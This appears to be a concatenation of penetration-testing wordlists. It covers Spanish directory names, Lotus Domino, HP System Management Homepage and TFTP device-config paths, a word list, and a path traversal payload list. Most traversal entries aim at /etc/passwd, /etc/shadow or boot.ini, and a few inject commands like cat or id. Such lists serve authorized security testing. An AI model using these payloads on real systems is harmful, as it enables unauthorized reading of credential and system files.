localizador 156 | mapa 157 | medios 158 | menu 159 | mostrar 160 | movimientos 161 | muestra 162 | muestras 163 | nada 164 | noticia 165 | noticias 166 | nucleo 167 | nuevo 168 | nulo 169 | oculto 170 | oficina 171 | oficinas 172 | olvidado 173 | organizacion 174 | organizaciones 175 | pagina 176 | paginas 177 | palabra 178 | panel 179 | pantalla 180 | pantallas 181 | paso 182 | perfil 183 | perfiles 184 | personal 185 | personales 186 | pestana 187 | pizarra 188 | plano 189 | plantilla 190 | plantillas 191 | portada 192 | portal 193 | ppal 194 | primero 195 | principal 196 | principio 197 | privado 198 | probando 199 | procesos 200 | productos 201 | programa 202 | programador 203 | programas 204 | proveedores 205 | proyecto 206 | proyectos 207 | prueba 208 | pruebas 209 | publicacion 210 | publicaciones 211 | publico 212 | puerta 213 | raiz 214 | recoger 215 | registro 216 | registros 217 | remoto 218 | repaso 219 | respaldo 220 | revista 221 | rincon 222 | salon 223 | salvar 224 | seccion 225 | secreto 226 | segundo 227 | seguridad 228 | seleccion 229 | servicios 230 | servidor 231 | sistemas 232 | sitio 233 | subir 234 | sumario 235 | tabla 236 | tablas 237 | tecnico 238 | tecnicos 239 | temas 240 | temporal 241 | tercer 242 | texto 243 | tienda 244 | titular 245 | todas 246 | todo 247 | todos 248 | trabajador 249 | trabajadores 250 | traspaso 251 | usuario 252 | usuarios 253 | vacio 254 | validar 255 | ventana 256 | ver 257 | viejo 258 | -------------------------------------------------------------------------------- /wordlists/wfuzz/Injections/Traversal.txt: -------------------------------------------------------------------------------- 1 | ../../../../../../../../../../../../etc/hosts%00 2 | ../../../../../../../../../../../../etc/hosts 3 | ../../boot.ini 4 | /../../../../../../../../%2A 5 | ../../../../../../../../../../../../etc/passwd%00 6 | ../../../../../../../../../../../../etc/passwd 7 | ../../../../../../../../../../../../etc/shadow%00 8 | ../../../../../../../../../../../../etc/shadow 9 | /../../../../../../../../../../etc/passwd^^ 10 | /../../../../../../../../../../etc/shadow^^ 11 | /../../../../../../../../../../etc/passwd 12 | /../../../../../../../../../../etc/shadow 13 | /./././././././././././etc/passwd 14 | /./././././././././././etc/shadow 15 | \..\..\..\..\..\..\..\..\..\..\etc\passwd 16 | \..\..\..\..\..\..\..\..\..\..\etc\shadow 17 | ..\..\..\..\..\..\..\..\..\..\etc\passwd 18 | ..\..\..\..\..\..\..\..\..\..\etc\shadow 19 | /..\../..\../..\../..\../..\../..\../etc/passwd 20 | /..\../..\../..\../..\../..\../..\../etc/shadow 21 | .\\./.\\./.\\./.\\./.\\./.\\./etc/passwd 22 | .\\./.\\./.\\./.\\./.\\./.\\./etc/shadow 23 | \..\..\..\..\..\..\..\..\..\..\etc\passwd%00 24 | \..\..\..\..\..\..\..\..\..\..\etc\shadow%00 25 | ..\..\..\..\..\..\..\..\..\..\etc\passwd%00 26 | ..\..\..\..\..\..\..\..\..\..\etc\shadow%00 27 | %0a/bin/cat%20/etc/passwd 28 | %0a/bin/cat%20/etc/shadow 29 | %00/etc/passwd%00 30 | %00/etc/shadow%00 31 | %00../../../../../../etc/passwd 32 | %00../../../../../../etc/shadow 33 | /../../../../../../../../../../../etc/passwd%00.jpg 34 | /../../../../../../../../../../../etc/passwd%00.html 35 | /..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd 36 | /..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow 37 | /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd 38 | /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow 39 | %25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00 40 | /%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00 41 | %25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%00 42 | %25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%255cboot.ini 43 | /%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini 44 | \\'/bin/cat%20/etc/passwd\\' 45 | \\'/bin/cat%20/etc/shadow\\' 46 | ../../../../../../../../conf/server.xml 47 | /../../../../../../../../bin/id| 48 | C:/inetpub/wwwroot/global.asa 49 | C:\inetpub\wwwroot\global.asa 50 | C:/boot.ini 51 | C:\boot.ini 52 | ../../../../../../../../../../../../localstart.asp%00 53 | ../../../../../../../../../../../../localstart.asp 54 | ../../../../../../../../../../../../boot.ini%00 55 | ../../../../../../../../../../../../boot.ini 56 | /./././././././././././boot.ini 57 | /../../../../../../../../../../../boot.ini%00 58 | /../../../../../../../../../../../boot.ini 59 | /..\../..\../..\../..\../..\../..\../boot.ini 60 | /.\\./.\\./.\\./.\\./.\\./.\\./boot.ini 61 | \..\..\..\..\..\..\..\..\..\..\boot.ini 62 | ..\..\..\..\..\..\..\..\..\..\boot.ini%00 63 | ..\..\..\..\..\..\..\..\..\..\boot.ini 64 | /../../../../../../../../../../../boot.ini%00.html 65 | /../../../../../../../../../../../boot.ini%00.jpg 66 | /.../.../.../.../.../ 67 | ..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini 68 | /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini -------------------------------------------------------------------------------- /wordlists/metasploit/dangerzone_b.txt: -------------------------------------------------------------------------------- 1 | LAWYER 2 | GLASS 3 | HUNT 4 | UNDERSTANDING 5 | RELATION 6 | HORROR 7 | CASH 8 | TWO 9 | WHEEL 10 | COMPLAINT 11 | RISK 12 | BANANA 13 | ANGEL 14 | KANGAROO 15 | BACON 16 | TISSUE 17 | TURTLENECK 18 | DAUGHTER 19 | SUGGESTION 20 | WEAR 21 | QUESTION 22 | SOUTH 23 | LENGTH 24 | BONUS 25 | STOCK 26 | FEELING 27 | BAND 28 | HUSBAND 29 | ADVERTISING 30 | AUTHOR 31 | GUEST 32 | PROOF 33 | FRUIT 34 | GUARD 35 | TOUCH 36 | WILL 37 | TOE 38 | STRENGTH 39 | DRESS 40 | PLEASURE 41 | ESTIMATE 42 | OPPORTUNITY 43 | NOTE 44 | DIG 45 | DISH 46 | GROUP 47 | STRUCTURE 48 | MIND 49 | EDITOR 50 | ADVANTAGE 51 | YOUNG 52 | GAP 53 | SERVE 54 | VOICE 55 | WAKE 56 | DROP 57 | CURRENCY 58 | COMFORT 59 | SPECIALIST 60 | SCRATCH 61 | MISSION 62 | CARPET 63 | INTERVIEW 64 | SHOPPING 65 | CONSIST 66 | SINGLE 67 | IMAGINATION 68 | SPARE 69 | COVER 70 | EXAMINATION 71 | ROUTINE 72 | COLLAR 73 | WALL 74 | SWIM 75 | ATTACK 76 | SPIRITUAL 77 | JURY 78 | ROLE 79 | DREAM 80 | BREAK 81 | LEG 82 | TEACHER 83 | SHOE 84 | PANIC 85 | DEPARTURE 86 | VALUE 87 | BONE 88 | WAIT 89 | AMOUNT 90 | TOUR 91 | STAND 92 | TRUFFLE 93 | ASSOCIATE 94 | WEIRD 95 | RING 96 | BUILDING 97 | ABROAD 98 | ALTERNATIVE 99 | DIFFICULTY 100 | NASTY 101 | SIGN 102 | CLERK 103 | PRESENT 104 | STRETCH 105 | CHILD 106 | NOVEL 107 | SHOWER 108 | AD 109 | ATTENTION 110 | NEWS 111 | GARAGE 112 | BORDER 113 | BASIS 114 | PROCESS 115 | TONIGHT 116 | TRUTH 117 | PERIOD 118 | CATEGORY 119 | APPOINTMENT 120 | SPACE 121 | MILK 122 | DRUNK 123 | MISTAKE 124 | SYMPATHY 125 | EFFORT 126 | BUTTON 127 | RED 128 | CLASS 129 | WAY 130 | TOOTH 131 | PHYSICS 132 | BITTER 133 | SITUATION 134 | LAND 135 | PEAK 136 | BRUSH 137 | SAIL 138 | SOUP 139 | VAST 140 | RISE 141 | INEVITABLE 142 | CHAIN 143 | PREPARATION 144 | TOTAL 145 | SPIRIT 146 | ROAD 147 | SINGER 148 | FORCE 149 | IMPLEMENT 150 | MAIL 151 | EVENING 152 | TEMPERATURE 153 | DEALER 154 | ARRIVAL 155 | TARGET 156 | SHELTER 157 | WASH 158 | FOCUS 159 | ASSUMPTION 160 | INTENTION 161 | ACCIDENT 162 | HORSE 163 | MONTH 164 | MAN 165 | PACKAGE 166 | DEPRESSION 167 | COOKIE 168 | RESPOND 169 | LEATHER 170 | CATCH 171 | CULTURE 172 | TEACH 173 | PRACTICE 174 | SOFTWARE 175 | COMFORTABLE 176 | TEA 177 | FINDING 178 | ANSWER 179 | WRITING 180 | SEAT 181 | DIFFERENCE 182 | SICK 183 | CRAZY 184 | FLOW 185 | ACCOUNT 186 | MEMBER 187 | COUNTY 188 | INFORMATION 189 | PART 190 | CHECK 191 | GOLF 192 | RAIN 193 | STUFF 194 | CLUE 195 | MASTER 196 | REWARD 197 | WHILE 198 | OPTION 199 | LUCK 200 | DISCOUNT 201 | POTENTIAL 202 | FIGURE 203 | DISPLAY 204 | DESIGN 205 | VALUABLE 206 | COMMUNICATION 207 | INSURANCE 208 | PREFERENCE 209 | SUBJECT 210 | CLUB 211 | OIL 212 | BUNCH 213 | GROWTH 214 | IMPORTANCE 215 | REGION 216 | LOSS 217 | BOYFRIEND 218 | CONTEST 219 | PLANE 220 | DEBATE 221 | ICE 222 | NURSE 223 | HOLD 224 | GO 225 | APPLICATION 226 | SALT 227 | PROTECTION 228 | HEART 229 | WEATHER 230 | OVEN 231 | JUDGMENT 232 | IMPACT 233 | MISS 234 | CLIMATE 235 | SEARCH 236 | SON 237 | ACT 238 | STAGE 239 | OFFER 240 | POSSIBILITY 241 | TRY 242 | STUDIO 243 | INCOME 244 | SOURCE 245 | BAG 246 | PLACE 247 | NOISE 248 | NEGOTIATION 249 | BUS 250 | HALL 251 | ASSISTANCE 252 | MEDICINE 253 | NOBODY 254 | CHARITY 255 | EMPLOY 256 | WORLD 257 | AFTERNOON 258 | PHASE 259 | RESEARCH 260 | SALE 261 | WINNER 262 | CONTRACT 263 | PULL 264 | MAP 265 | DESIGNER 266 | MEMORY 267 | BALANCE 268 | MEDIUM 269 | COFFEE 270 | MALL 271 | PHONE 272 | KING 273 | SCALE 274 | THROAT 275 | SUSPECT 276 | QUANTITY 277 | YARD 278 | EXCHANGE 279 | CHAMPIONSHIP 280 | PONY 281 | STREET 282 | TIME 283 | HOPE 284 | YOU 285 | NIGHT 286 | QUARTER 287 | REPLY 288 | DRAG 289 | MINUTE 290 | SUPPORT 291 | SUIT 292 | SIR 293 | BACKGROUND 294 | MANNER 295 | MANAGER 296 | MATCH 297 | GENERAL 298 | TILL 299 | EXPERT 300 | TRANSPORTATION 301 | DEFINITION 302 | PLASTIC 303 | CAKE 304 | BUDDY 305 | MINE 306 | -------------------------------------------------------------------------------- /wordlists/wfuzz/vulns/domino.txt: -------------------------------------------------------------------------------- 1 | .nsf/../notes.ini 2 | .nsf/../winnt/win.ini 3 | 852566C90012664F 4 | ?Open 5 | ?OpenServer 6 | AgentRunner.nsf 7 | DEASAppDesign.nsf 8 | DEASLog.nsf 9 | DEASLog01.nsf 10 | DEASLog02.nsf 11 | DEASLog03.nsf 12 | DEASLog04.nsf 13 | DEASLog05.nsf 14 | DEESAdmin.nsf 15 | a_domlog.nsf 16 | account.nsf 17 | accounts.nsf 18 | adm-bin/listdb.exe 19 | admin.nsf 20 | admin4.nsf 21 | admin5.nsf 22 | adminadm0disk.nsf 23 | adminadm0plog.nsf 24 | agentrunner.nsf 25 | agentrunner.nsf 26 | alog.nsf 27 | archive/a_domlog.nsf 28 | archive/l_domlog.nsf 29 | billing.nsf 30 | bookmark.nsf 31 | bookmarks.nsf 32 | books.nsf 33 | busytime.nsf 34 | busytime.nsf 35 | calendar.nsf 36 | catalog.nsf 37 | catalog.nsf 38 | cersvr.nsf 39 | certa.nsf 40 | certlog.nsf 41 | certsrv.nsf 42 | certsrv.nsf 43 | chatlog.nsf 44 | clbusy.nsf 45 | cldbdir.nsf 46 | clusta4.nsf 47 | collect4.nsf 48 | cpa.nsf 49 | customerdata 50 | da.nsf 51 | database.nsf 52 | db.nsf 53 | dba4.nsf 54 | dbdirman.nsf 55 | dclf.nsf 56 | decsadm.nsf 57 | decsadm.nsf 58 | decslog.nsf 59 | default.nsf 60 | deslog.nsf 61 | diiop_ior.txt 62 | dirassist.nsf 63 | doc/dspug.nsf 64 | doc/helpadmn.nsf 65 | doc/javapg.nsf 66 | doc/readmec.nsf 67 | doladmin.nsf 68 | domadmin.nsf 69 | domcfg.nsf 70 | domguide.nsf 71 | domlog.nsf 72 | domlog.nsf 73 | dspug.nsf 74 | dspug.nsf 75 | event.nsf 76 | events.nsf 77 | events4.nsf 78 | events4.nsf 79 | events5.nsf 80 | group.nsf 81 | groups.nsf 82 | help/decsdoc.nsf 83 | help/decsdoc6.nsf 84 | help/dols_help.nsf 85 | help/help5_admin.nsf 86 | help/help5_client.nsf 87 | help/help5_designer.nsf 88 | help/help65_admin.nsf 89 | help/help65_client.nsf 90 | help/help65_designer.nsf 91 | help/lccon.nsf 92 | help/lccon6.nsf 93 | help/lsxlc.nsf 94 | help/lsxlc6.nsf 95 | help/readme.nsf 96 | help4.nsf 97 | helplt4.nsf 98 | hidden.nsf 99 | homepage.nsf 100 | iNotes/Forms5.nsf 101 | iNotes/Forms5.nsf/$DefaultNav 102 | iNotes/Forms6.nsf 103 | iNotes/help65_iwa_en.nsf 104 | iNotesForms5.nsf 105 | jotter.nsf 106 | l_domlog.nsf 107 | lccon.nsf 108 | ldap.nsf 109 | leiadm.nsf 110 | leilog.nsf 111 | leivlt.nsf 112 | lndfr.nsf 113 | log.nsf 114 | log.nsf 115 | log4a.nsf 116 | loga4.nsf 117 | lsxlc.nsf 118 | mab.nsf 119 | mail.box 120 | mail.box 121 | mail/admin.nsf 122 | mail/pxp.nsf 123 | mail1.box 124 | mail10.box 125 | mail2.box 126 | mail3.box 127 | mail4.box 128 | mail5.box 129 | mail6.box 130 | mail7.box 131 | mail8.box 132 | mail9.box 133 | mailw46.nsf 134 | msdwda.nsf 135 | mtatbls.nsf 136 | mtstore.nsf 137 | names.nsf 138 | names.nsf 139 | nntp/nd000000.nsf 140 | nntp/nd000001.nsf 141 | nntp/nd000002.nsf 142 | nntp/nd000003.nsf 143 | nntp/nd000004.nsf 144 | nntppost.nsf 145 | nntppost.nsf 146 | notes.nsf 147 | ntsync4.nsf 148 | ntsync45.nsf 149 | ntsync45.nsf 150 | patrol41.nsf 151 | perweb.nsf 152 | private.nsf 153 | proghelp/KBCCV11.NSF 154 | proghelp/KBNV11.NSF 155 | proghelp/KBSSV11.NSF 156 | public.nsf 157 | puserinfo.nsf 158 | qpadmin.nsf 159 | qstart.nsf 160 | quickplace/quickplace/main.nsf 161 | quickplacequickplacemain.nsf 162 | quickstart/qstart50.nsf 163 | quickstart/wwsample.nsf 164 | readme.nsf 165 | reports.nsf 166 | reports.nsf 167 | resource.nsf 168 | sample/faqw46.nsf 169 | sample/framew46.nsf 170 | sample/pagesw46.nsf 171 | sample/siregw46.nsf 172 | sample/site1w46.nsf 173 | sample/site2w46.nsf 174 | sample/site3w46.nsf 175 | schema.nsf 176 | schema50.nsf 177 | schema50.nsf 178 | secret.nsf 179 | setup.nsf 180 | setup.nsf 181 | setupweb.nsf 182 | setupweb.nsf 183 | smbcfg.nsf 184 | smbcfg.nsf 185 | smconf.nsf 186 | smency.nsf 187 | smhelp.nsf 188 | smmsg.nsf 189 | smquar.nsf 190 | smsolar.nsf 191 | smtime.nsf 192 | smtp.box 193 | smtp.nsf 194 | smtpibwq.nsf 195 | smtpobwq.nsf 196 | smtptbls.nsf 197 | smvlog.nsf 198 | software.nsf 199 | srvnam.htm 200 | srvnam.nsf 201 | statauths.nsf 202 | statautht.nsf 203 | statmail.nsf 204 | statmail.nsf 205 | statrep.nsf 206 | statrep.nsf 207 | stauths.nsf 208 | stautht.nsf 209 | stconf.nsf 210 | stconf.nsf 211 | stconfig.nsf 212 | stconfig.nsf 213 | stdnaset.nsf 214 | stdnaset.nsf 215 | stdomino.nsf 216 | stlog.nsf 217 | stlog.nsf 218 | streg.nsf 219 | stsrc.nsf 220 | stsrc.nsf 221 | test.nsf 222 | userreg.nsf 223 | users.nsf 224 | vpuserinfo.nsf 225 | web.nsf 226 | web.nsf 227 | webadmin.nsf 228 | welcome.nsf 229 | 230 | -------------------------------------------------------------------------------- /wordlists/metasploit/tftp.txt: -------------------------------------------------------------------------------- 1 | 000000000000.cfg 2 | 000000000000-directory~.xml 3 | 000000000000-directory.xml 4 | 000000000000-phone.cfg 5 | 256T.CM 6 | 323tosip1_1.bin 7 | 4601_02_readme_R2_3.txt 8 | 4601dbte1_82.bin 9 | 4602_02SWSIPreadme_R1_1.txt 10 | 4602dbte1_82.bin 11 | 4602sbte1_82.bin 12 | 4610_20_readme_R2_3.txt 13 | 4610_20_readme_SIP_R2_2.txt 14 | 4624_12_06readme_1_8_3.txt 15 | 4625_readme_2_5.txt 16 | 4690_010707.bin 17 | 4690_readme_1_7_7.txt 18 | 46xxreadme_111405.txt 19 | 46xxsettings.txt 20 | 46xxupgrade.scr 21 | 6100-113.bin 22 | 7200-118.bin 23 | a01d01b2_3.bin 24 | a02d01b2_3.bin 25 | a10d01b2_3.bin 26 | a20d01a2_3.bin 27 | a20d01b2_3.bin 28 | a25d01a2_5.bin 29 | aastra.cfg 30 | active/system.ini 31 | admin.bin 32 | admin.cfg 33 | admin-confg 34 | admin-config 35 | administrator.bin 36 | administrator.cfg 37 | administrator-config 38 | applications.cfg 39 | b01d01b2_3.bin 40 | b02d01b2_3.bin 41 | b10d01b2_3.bin 42 | b20d01a2_3.bin 43 | b20d01b2_3.bin 44 | b25d01a2_5.bin 45 | backup.bin 46 | backup.cfg 47 | backup-config 48 | backup.img 49 | bbla0_83.bin 50 | boot.bin 51 | boot.cfg 52 | boot-config 53 | bootrom.ld 54 | boot.txt 55 | bridge-confg 56 | CFE.bin 57 | cfg.bin 58 | cisco-confg 59 | cisconet.bin 60 | cisconet.cfg 61 | ciscortr.bin 62 | ciscortr.cfg 63 | cisco_util 64 | code.bin 65 | code.cfg 66 | code-config 67 | code.img 68 | config.bin 69 | config.dump 70 | config.ini 71 | config.txt 72 | CP7912010301SIP050608A.sbin 73 | cvt01_2_3.bin 74 | cvt02_2_3.bin 75 | cvt02sw_2_3.bin 76 | debian.cfg 77 | def06r1_8_3.bin 78 | def24r1_8_3.bin 79 | default.bin 80 | default.cfg 81 | default-config 82 | default.ini 83 | device.bin 84 | device.cfg 85 | device-config 86 | dialplan.xml 87 | dump.dmc 88 | features.cfg 89 | firewall-nat.cfg 90 | firmware.bin 91 | firmware.cfg 92 | firmware-config 93 | firmware.img 94 | gateway-confg 95 | gkdefault.cfg 96 | gw-confg 97 | H323.cfg 98 | ifIndex-table 99 | image.bin 100 | image.cfg 101 | image-config 102 | image.eim 103 | image.out 104 | infrared.txt 105 | local.bin 106 | local.cfg 107 | local-config 108 | lync.cfg 109 | main.bin 110 | main.cfg 111 | main-config 112 | main.img 113 | merlin2.pcm 114 | myrouter-confg 115 | n831r0.bin 116 | n84r1.bin 117 | nir4113.bin 118 | nir539R4.bin 119 | OS79XX.TXT 120 | P003-07-5-00.bin 121 | P003-07-5-00.sbn 122 | P003-08-11-00.bin 123 | P003-08-11-00.sbn 124 | P003-08-2-00.bin 125 | P003-08-2-00.sbn 126 | P003-08-3-00.bin 127 | P003-08-3-00.sbn 128 | P003-08-6-00.bin 129 | P003-08-6-00.sbn 130 | P003-08-9-00.bin 131 | P003-08-9-00.sbn 132 | P003-8-12-00.bin 133 | P003-8-12-00.sbn 134 | P0S3-07-5-00.bin 135 | P0S3-07-5-00.loads 136 | P0S3-07-5-00.sb2 137 | P0S3-08-11-00.loads 138 | P0S3-08-11-00.sb2 139 | P0S3-08-2-00.loads 140 | P0S3-08-2-00.sb2 141 | P0S3-08-3-00.loads 142 | P0S3-08-3-00.sb2 143 | P0S3-08-6-00.loads 144 | P0S3-08-6-00.sb2 145 | P0S3-08-9-00.loads 146 | P0S3-08-9-00.sb2 147 | P0S3-8-12-00.loads 148 | P0S3-8-12-00.sb2 149 | passwd.bin 150 | passwd.cfg 151 | passwd.ini 152 | password.bin 153 | password.cfg 154 | password.ini 155 | persistent.bin 156 | persistent.cfg 157 | persistent-data 158 | phbook00e011010455.txt 159 | phone1.cfg 160 | polycomConfig.xsd 161 | polycom.xml 162 | prestige 163 | prestige.bin 164 | prestige.cfg 165 | private.bin 166 | private.cfg 167 | private-config 168 | pstn.cfg 169 | public.bin 170 | public.cfg 171 | pwd.bin 172 | pwd.cfg 173 | pwd.ini 174 | pxelinux.0 175 | pxelinux.cfg/default 176 | ram 177 | ram-0 178 | ras 179 | ras0 180 | ras-0 181 | ras1 182 | ras-1 183 | reg-advanced.cfg 184 | reg-basic.cfg 185 | region.cfg 186 | release.xml 187 | remote.bin 188 | remote.cfg 189 | remote-config 190 | RINGLIST.DAT 191 | rom 192 | rom0 193 | rom-0 194 | rom1 195 | rom-1 196 | router.bin 197 | router.cfg 198 | router-confg 199 | s10d01b2_2.bin 200 | s20d01b2_2.bin 201 | secret.bin 202 | secret.cfg 203 | secret-config 204 | SEP000F34118045.cnf 205 | SEP001562EA69E8.cnf 206 | SEPDefault.cnf 207 | SIP000F34118045.cnf 208 | sip_327.cfg 209 | sip_4602ap1_1.ebin 210 | sip_4602bt1_1.ebin 211 | sip_4602D01A.txt 212 | sip_4602D02A.txt 213 | sip-basic.cfg 214 | sip.cfg 215 | sip-confg 216 | SIPDefault.cnf 217 | SIPinsertMAChere.cnf 218 | sip-interop.cfg 219 | sip.ld 220 | sipto323_1_1.ebin 221 | sip.ver 222 | site.cfg 223 | SoundPointIPLocalization 224 | SoundPointIPWelcome.wav 225 | startup.bin 226 | startup.cfg 227 | startup-config 228 | syncinfo.xml 229 | system.bin 230 | system.cfg 231 | system-config 232 | system.img 233 | system.ini 234 | TECfg.bin 235 | TEImage.bin 236 | test 237 | test.txt 238 | text.txt 239 | uip200_463enc.pac 240 | uniden00e011030397.txt 241 | unidencom.txt 242 | v2210c.bin 243 | version.info 244 | video.cfg 245 | video-integration.cfg 246 | vip-confg 247 | voip-confg 248 | XMLDefault.cnf.xml 249 | -------------------------------------------------------------------------------- /wordlists/dirb/vulns/hpsmh.txt: -------------------------------------------------------------------------------- 1 | self/Configui 2 | self/GetHMMOs 3 | self/Reconnect 4 | self/Registration 5 | self/XEStatusReport 6 | self/configui 7 | activediscovery 8 | addcert.php 9 | addcert.php.en 10 | agents.php 11 | aiclogin.php 12 | aiclogin.php.en 13 | aiclogin_cert.php 14 | am 15 | appcfgcpqnotify 16 | appntucpqsecurepath 17 | avag 18 | axl300 19 | chp.js.en 20 | chpblank.htm 21 | chpbrdg.php 22 | chpbrdg.php.en 23 | chpdata.php 24 | chpdata.php.en 25 | chphead.php 26 | chphead.php.en 27 | chpif.js 28 | chplinkstrt.php 29 | chpload.htm.en 30 | chpstrt.php 31 | chpstrt.php.en 32 | chpview.php 33 | cica 34 | cimom 35 | cipram 36 | cmdscriptwin 37 | compaq.hmmo.am 38 | compaq.hmmo.avag 39 | compaq.hmmo.axl300 40 | compaq.hmmo.cica 41 | compaq.hmmo.cipram 42 | compaq.hmmo.cmdscriptwin 43 | compaq.hmmo.configreport 44 | compaq.hmmo.cpmagent 45 | compaq.hmmo.dclset 46 | compaq.hmmo.dclshow 47 | compaq.hmmo.dfw 48 | compaq.hmmo.dmiagent 49 | compaq.hmmo.ebs 50 | compaq.hmmo.fibre 51 | compaq.hmmo.gsview 52 | compaq.hmmo.rtr 53 | compaq.hmmo.securepath 54 | compaq.hmmo.shc 55 | compaq.hmmo.sid 56 | compaq.hmmo.survey 57 | compaq.hmmo.swvr 58 | compaq.hmmo.sysman_home_page 59 | compaq.hmmo.tsmc 60 | compaq.hmmo.usb 61 | compaq.hmmo.webagent 62 | compaq.hmmo.webdfwag 63 | compaq.hmmo.webdmiag 64 | compaq.hmmo.xfc 65 | compaq.wbemgroup.survey 66 | configreport 67 | cpmagent 68 | cpqlogin.htm 69 | cpqlogin.jar 70 | cpqlogin.php 71 | cpqlogin.php.en 72 | cpqopts.htm 73 | cpqopts.php 74 | cpqopts.php.en 75 | credits.php 76 | credits.php.en 77 | critical_11.gif 78 | critical_15.gif 79 | critical_20.gif 80 | critical_32.gif 81 | critical_7.gif 82 | css 83 | css/blue_theme.css 84 | css/common.css 85 | css/default.css 86 | css/green_theme.css 87 | css/logon.css 88 | css/magenta_theme.css 89 | css/orange_theme.css 90 | custcert.php.en 91 | custom.jpg 92 | custom_ui 93 | custom_ui/logo0.jpg 94 | custom_ui/logo1.jpg 95 | dclset 96 | dclshow 97 | dfw 98 | disabled_11.gif 99 | disabled_15.gif 100 | disabled_20.gif 101 | disabled_32.gif 102 | disabled_7.gif 103 | dmiagent 104 | ebs 105 | errlog.php 106 | errlog.php.en 107 | failed.htm 108 | favicon.ico 109 | fibre 110 | full_dns.php 111 | full_dns.php.en 112 | groups.php 113 | groups.php.en 114 | gsview 115 | help?query 116 | hphelp 117 | hphelp/WEB_INF 118 | hphelp/WEB_INF/cgi/namazu.cgi 119 | hphelp/about.htm 120 | hplogo.gif 121 | images 122 | images/hp_logo_invert.gif 123 | images/logon_title.gif 124 | images/photo.jpg 125 | images/status/minor_15.gif 126 | images/themes/blue/hp_logo_invert.gif 127 | images/themes/green/hp_logo_invert.gif 128 | images/themes/magenta/hp_logo_invert.gif 129 | images/themes/orange/hp_logo_invert.gif 130 | index.php 131 | index.php.en 132 | ipbind.php 133 | ipbind.php.en 134 | iprstrct.php 135 | iprstrct.php.en 136 | js 137 | js/FormManager.js 138 | js/LayoutManager.js 139 | js/buttonManager.js 140 | js/error_table.js 141 | js/functions.js 142 | js/global.js 143 | js/ui.js 144 | kerberos.php 145 | kerberos.php.en 146 | krbFailRedirect.php 147 | lang 148 | lang.php 149 | lang/en/language.php 150 | lang/en/log_messages.php 151 | lang_webapp.php 152 | legend.html 153 | local.php 154 | local.php.en 155 | log_engine.php 156 | message.php 157 | message.php.en 158 | message_strings.php 159 | mxhelp/cgi-bin/namazucgi 160 | navfile.htm 161 | no_javascript.html 162 | no_javascript.php 163 | notfound.php 164 | port2301.php 165 | proxy/AddXECert 166 | proxy/DataValidation 167 | proxy/GetKey 168 | proxy/GetSMHData 169 | proxy/Kerberos 170 | proxy/LookupTag 171 | proxy/SetSMHData 172 | proxy/auth 173 | proxy/getkey 174 | proxy/kerberos 175 | proxy/lookuptag 176 | proxy/reconnect 177 | proxy/registration 178 | proxy/reloadinifile 179 | proxy/resetclientcas 180 | proxy/smhgen_c.htm 181 | proxy/smhimp_c.htm 182 | proxy/smhreg_c.htm 183 | proxy/smhstatus 184 | proxy/smhui/* 185 | proxy/smhui/chptree.htm 186 | proxy/smhui/doaicafterlogin 187 | proxy/smhui/getaiccert 188 | proxy/smhui/getaiclogininfo 189 | proxy/smhui/getcertdata 190 | proxy/smhui/getcertinfo 191 | proxy/smhui/getlogininfo 192 | proxy/smhui/getsmhlog 193 | proxy/smhui/getuiinfo 194 | proxy/smhui/removecert 195 | proxy/ssllogin 196 | proxy/sso 197 | proxy/statusreport 198 | proxy/ste 199 | proxy/translatetag 200 | proxy/verify 201 | proxy/version 202 | proxy/xestatusreport 203 | red2301.html 204 | rtr 205 | shc 206 | showcert.php 207 | showcert.php.en 208 | sid 209 | smh.css 210 | smhhelp.php 211 | smhhelp.php.en 212 | smhrun 213 | smhsupport.php 214 | smhutil 215 | smhutil/snmpchp.php.en 216 | survey 217 | survey/surveyexe 218 | swvr 219 | sysman_home_page 220 | timeouts.php 221 | timeouts.php.en 222 | treebody.js.en 223 | treehead.htm.en 224 | treehead.htm.ja 225 | treetail.htm.en 226 | trstcert.php 227 | trstcert.php.en 228 | tsmc 229 | ui_config.php 230 | usb 231 | user_prefs.php 232 | vcrepository 233 | webagent 234 | webbum.gif 235 | webdfwag 236 | webdmiag 237 | webhead.gif 238 | xfc 239 | -------------------------------------------------------------------------------- /wordlists/dirb/vulns/domino.txt: -------------------------------------------------------------------------------- 1 | ?Open 2 | ?OpenServer 3 | AgentRunner.nsf 4 | DEASAppDesign.nsf 5 | DEASLog.nsf 6 | DEASLog01.nsf 7 | DEASLog02.nsf 8 | DEASLog03.nsf 9 | DEASLog04.nsf 10 | DEASLog05.nsf 11 | DEESAdmin.nsf 12 | a_domlog.nsf 13 | account.nsf 14 | accounts.nsf 15 | activity.nsf 16 | adm-bin/acls.exe 17 | adm-bin/alerts.exe 18 | adm-bin/console.exe 19 | adm-bin/listdb.exe 20 | adm-bin/webstats.exe 21 | admin.nsf 22 | admin4.nsf 23 | admin5.nsf 24 | adminadm0disk.nsf 25 | adminadm0plog.nsf 26 | agentrunner.nsf 27 | alog.nsf 28 | alog4.nsf 29 | archive/a_domlog.nsf 30 | archive/l_domlog.nsf 31 | billing.nsf 32 | bookmark.nsf 33 | bookmarks.nsf 34 | books.nsf 35 | busytime.nsf 36 | calendar.nsf 37 